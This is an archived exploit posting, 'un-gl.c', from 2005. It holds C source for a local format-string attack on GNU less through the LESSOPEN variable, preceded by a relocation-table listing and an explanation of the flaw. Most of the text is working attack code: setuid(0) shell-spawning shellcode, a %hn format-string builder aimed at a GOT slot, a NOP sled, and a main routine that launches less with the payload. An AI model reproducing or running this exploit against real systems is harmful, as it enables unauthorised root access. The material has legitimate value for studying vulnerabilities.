
un-gl.c

un-gl.c
Posted Nov 2, 2005
Authored by unl0ck, Darkeagle | Site exploiterz.org

GNU less local exploit.

tags | local
SHA-256 | 58a7a9a42bea20075104c3381ea5615bb56bb62a0b6c2d5e9eb359d26ba79dc6

un-gl.c

/*        GNU LESS LOCAL FORMAT STRING EXPLOIT


/usr/bin/less: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0805fd98 R_386_GLOB_DAT __gmon_start__
0805fda0 R_386_COPY ospeed
0805fda2 R_386_COPY PC
0805fda4 R_386_COPY stdin
0805fc94 R_386_JUMP_SLOT fgetc
0805fc98 R_386_JUMP_SLOT tgetnum
0805fc9c R_386_JUMP_SLOT strchr
0805fca0 R_386_JUMP_SLOT getpid
0805fca4 R_386_JUMP_SLOT __ctype_tolower_loc
0805fca8 R_386_JUMP_SLOT tgoto
0805fcac R_386_JUMP_SLOT regexec
0805fcb0 R_386_JUMP_SLOT _longjmp
0805fcb4 R_386_JUMP_SLOT write
0805fcb8 R_386_JUMP_SLOT fileno
0805fcbc R_386_JUMP_SLOT strcmp
0805fcc0 R_386_JUMP_SLOT close
0805fcc4 R_386_JUMP_SLOT getenv
0805fcc8 R_386_JUMP_SLOT signal
0805fccc R_386_JUMP_SLOT regfree
0805fcd0 R_386_JUMP_SLOT pclose
0805fcd4 R_386_JUMP_SLOT tgetflag
0805fcd8 R_386_JUMP_SLOT strerror
0805fcdc R_386_JUMP_SLOT tcsetattr
0805fce0 R_386_JUMP_SLOT setlocale
0805fce4 R_386_JUMP_SLOT __errno_location
0805fce8 R_386_JUMP_SLOT system
0805fcec R_386_JUMP_SLOT popen
0805fcf0 R_386_JUMP_SLOT cfgetospeed
0805fcf4 R_386_JUMP_SLOT time
0805fcf8 R_386_JUMP_SLOT creat64
0805fcfc R_386_JUMP_SLOT tputs
0805fd00 R_386_JUMP_SLOT fgets
0805fd04 R_386_JUMP_SLOT strstr
0805fd08 R_386_JUMP_SLOT strlen
0805fd0c R_386_JUMP_SLOT sleep
0805fd10 R_386_JUMP_SLOT __strtol_internal
0805fd14 R_386_JUMP_SLOT lseek64
0805fd18 R_386_JUMP_SLOT strncmp
0805fd1c R_386_JUMP_SLOT __xstat64
0805fd20 R_386_JUMP_SLOT fsync
0805fd24 R_386_JUMP_SLOT __libc_start_main
0805fd28 R_386_JUMP_SLOT tgetent
0805fd2c R_386_JUMP_SLOT sigsetmask
0805fd30 R_386_JUMP_SLOT strcat
0805fd34 R_386_JUMP_SLOT printf
0805fd38 R_386_JUMP_SLOT memcpy
0805fd3c R_386_JUMP_SLOT open64
0805fd40 R_386_JUMP_SLOT fclose
0805fd44 R_386_JUMP_SLOT __ctype_toupper_loc
0805fd48 R_386_JUMP_SLOT fopen64
0805fd4c R_386_JUMP_SLOT regcomp
0805fd50 R_386_JUMP_SLOT exit
0805fd54 R_386_JUMP_SLOT calloc
0805fd58 R_386_JUMP_SLOT _IO_putc
0805fd5c R_386_JUMP_SLOT free
0805fd60 R_386_JUMP_SLOT ioctl
0805fd64 R_386_JUMP_SLOT isatty
0805fd68 R_386_JUMP_SLOT strncpy
0805fd6c R_386_JUMP_SLOT dup
0805fd70 R_386_JUMP_SLOT _setjmp
0805fd74 R_386_JUMP_SLOT kill
0805fd78 R_386_JUMP_SLOT sprintf <----------------------------
0805fd7c R_386_JUMP_SLOT _IO_getc
0805fd80 R_386_JUMP_SLOT __ctype_b_loc
0805fd84 R_386_JUMP_SLOT tgetstr
0805fd88 R_386_JUMP_SLOT tcgetattr
0805fd8c R_386_JUMP_SLOT read
0805fd90 R_386_JUMP_SLOT __fxstat64
0805fd94 R_386_JUMP_SLOT strcpy

EXAMPLE: dynamic relocation records (objdump -R style) of /usr/bin/less on MANDRAKE LINUX 10.0 OR.
The GOT slot to pass on the command line is taken from a listing like this one; it differs per build.

The bug is in less' filename.c: the LESSOPEN value is used as the *format* argument, so the user controls the format string:

<<
sprintf(cmd, lessopen, filename);
>>

To exploit it, set the LESSOPEN environment variable to the payload (format string + NOP sled + shellcode)
and run less on some filename (it need not exist). Because the attacker supplies their own environment,
this only gains anything where less runs with privileges the caller lacks (e.g. setuid/sudo wrappers).

*/

#define _POSIX_C_SOURCE 200809L /* setenv() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Scratch buffer that cfstr() assembles its format string in and returns a
 * pointer to; main() also refers to its size.  Shared global: not reentrant. */
char buf[100];

/* i386 Linux shellcode, decoded from the bytes below:
 *   xor eax,eax; xor ebx,ebx; mov al,0x17; int 0x80      -> setuid(0)
 *   push "/bin//sh", build argv, mov al,0x0b; int 0x80   -> execve("/bin//sh", ...)
 * Contains no 0x00 byte, so strlen() in main() measures the whole thing and it
 * survives being passed through the environment. */
char shellcode[] = // 1337 unl0ck team small shellcode with setuid(0) ;)
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

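/*
 * Return the current stack pointer (%esp) so main() can guess, plus OFFSET,
 * where the NOP sled in less' environment will land.  i386 inline asm.
 *
 * The original left the value in %eax and fell off the end of a non-void
 * function, which is undefined behaviour (an optimizing compiler may not
 * preserve %eax).  Read %esp through an output operand and return it.
 */
long getsp(void)
{
    unsigned int sp;

    __asm__ __volatile__("movl %%esp,%0" : "=r"(sp));
    return (long)sp;
}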

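/*
 * Build the two-write %hn format string that stores RET at GOT on a
 * little-endian target: low 16 bits at GOT, high 16 bits at GOT+2.
 *
 * Layout:  <GOT+2, 4 raw bytes><GOT, 4 raw bytes>%.Px%A$hn%.Qx%B$hn
 * The two addresses come first so that, once the string sits on the target's
 * stack, they are reachable as positional parameters ALIGN (GOT+2) and
 * ALIGN+1 (GOT).  The smaller half is written first because the %n character
 * counter only grows; the first padding is reduced by the 8 address bytes
 * already emitted.
 *
 * Fixes versus the original: GOT+2 is computed with carry (the old
 * (GOT&0xff)+2 wrapped inside the low byte for 0xfe/0xff), the buffer is
 * written with snprintf(), and a 0x00 byte in either address -- which
 * terminates the string early via %c -- is reported on stderr.
 *
 * Returns a pointer to the global scratch buffer `buf` (not reentrant).
 * Remaining caveats: a half below 8 yields a negative precision, and the
 * count is off if the stack word consumed by %x prints more digits than
 * the requested precision.
 */
char *cfstr(long GOT, long RET, int ALIGN)
{
    long hi_addr = GOT + 2;
    int high = (int)((RET >> 16) & 0xffff);
    int low = (int)(RET & 0xffff);
    unsigned char a[8];
    int first_pad, first_arg, second_pad, second_arg;
    int i;

    for (i = 0; i < 4; i++) {
        a[i] = (unsigned char)((hi_addr >> (8 * i)) & 0xff);
        a[4 + i] = (unsigned char)((GOT >> (8 * i)) & 0xff);
    }
    for (i = 0; i < 8; i++) {
        if (a[i] == 0) {
            fprintf(stderr, "[!] address byte %d is 0x00: format string will be truncated\n", i);
            break;
        }
    }

    if (high > low) {
        first_pad = low - 8;        /* low half -> GOT (ALIGN+1) */
        first_arg = ALIGN + 1;
        second_pad = high - low;    /* high half -> GOT+2 (ALIGN) */
        second_arg = ALIGN;
    } else {
        first_pad = high - 8;       /* high half -> GOT+2 (ALIGN) */
        first_arg = ALIGN;
        second_pad = low - high;    /* low half -> GOT (ALIGN+1) */
        second_arg = ALIGN + 1;
    }

    memset(buf, 0x00, sizeof buf);
    snprintf(buf, sizeof buf, "%c%c%c%c%c%c%c%c%%.%dx%%%d$hn%%.%dx%%%d$hn",
             a[0], a[1], a[2], a[3], a[4], a[5], a[6], a[7],
             first_pad, first_arg, second_pad, second_arg);

    return buf;
}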

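/*
 * Entry point.  Usage: un-gl <OFFSET> <GOT> [ALIGN]
 *   OFFSET  signed decimal added to this process' %esp (getsp()) to guess
 *           where the NOP sled lands in less' address space
 *   GOT     hex GOT slot (optional 0x prefix); 4 is added before use, as in
 *           the original -- presumably the caller passes the preceding
 *           entry.  Kept for compatibility, see cfstr().
 *   ALIGN   optional positional index of the format string on the target's
 *           stack (default 2, the original's hard-coded value)
 *
 * Builds LESSOPEN = <cfstr() format string> "LESS" <NOP sled> <shellcode>
 * and runs `less -f a`, which passes LESSOPEN to sprintf() as the format.
 *
 * Fixes versus the original: GOT was read uninitialized with only one
 * argument; the concatenated payload (~32 + 999 bytes) overflowed
 * exploit[1000]; sscanf("%x") and printf("%x"/"%d") were used on longs;
 * the malloc()ed buffer was unchecked and leaked; usage errors exited 0.
 * Returns 0 on success, 1 on bad arguments or failure to set the variable.
 */
int main(int argc, char **argv)
{
    enum { FMT_MAX = 100, SLED_LEN = 1000 };
    const char *envname = "LESSOPEN";
    char sled[SLED_LEN];
    char exploit[FMT_MAX + SLED_LEN];
    char *end;
    long off, got, ret;
    int align = 2;
    size_t sc_len, nops;
    int n;

    if (argc < 3 || argc > 4) {
        printf("Usage: %s <OFFSET> <GOT> [ALIGN]\n", argv[0]);
        return 1;
    }

    off = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0') {
        fprintf(stderr, "[-] bad OFFSET: %s\n", argv[1]);
        return 1;
    }
    got = (long)strtoul(argv[2], &end, 16);   /* accepts "0x..." and bare hex */
    if (end == argv[2] || *end != '\0') {
        fprintf(stderr, "[-] bad GOT: %s\n", argv[2]);
        return 1;
    }
    if (argc == 4) {
        align = (int)strtol(argv[3], &end, 10);
        if (end == argv[3] || *end != '\0' || align < 1) {
            fprintf(stderr, "[-] bad ALIGN: %s\n", argv[3]);
            return 1;
        }
    }
    ret = getsp() + off;

    /* Payload tail, identical to the original's net result: "LESS", then
     * NOPs, then the shellcode at the very end, NUL-terminated at SLED_LEN-1. */
    printf("[~] creating shellcode...\n");
    sc_len = strlen(shellcode);
    if (sc_len + 4 >= SLED_LEN) {
        fprintf(stderr, "[-] shellcode too long\n");
        return 1;
    }
    nops = SLED_LEN - 1 - sc_len - 4;
    memcpy(sled, "LESS", 4);
    memset(sled + 4, 0x90, nops);
    memcpy(sled + 4 + nops, shellcode, sc_len + 1);

    printf("[~] shellcode addr: 0x%lx, OFFSET: %ld, GOT: 0x%lx\n", ret, off, got);
    printf("[~] creating exploit...\n");
    n = snprintf(exploit, sizeof exploit, "%s%s", cfstr(got + 4, ret, align), sled);
    if (n < 0 || (size_t)n >= sizeof exploit) {
        fprintf(stderr, "[-] payload does not fit\n");
        return 1;
    }

    if (setenv(envname, exploit, 1) != 0) {
        printf("[-] failed! exiting...\n");
        return 1;
    }
    printf("[+] var successfully set!\n");

    /* less reads LESSOPEN from the inherited environment; the shell started
     * by system() does not interpret it. */
    if (system("less -f a") == -1) {
        perror("system");
        return 1;
    }
    return 0;
}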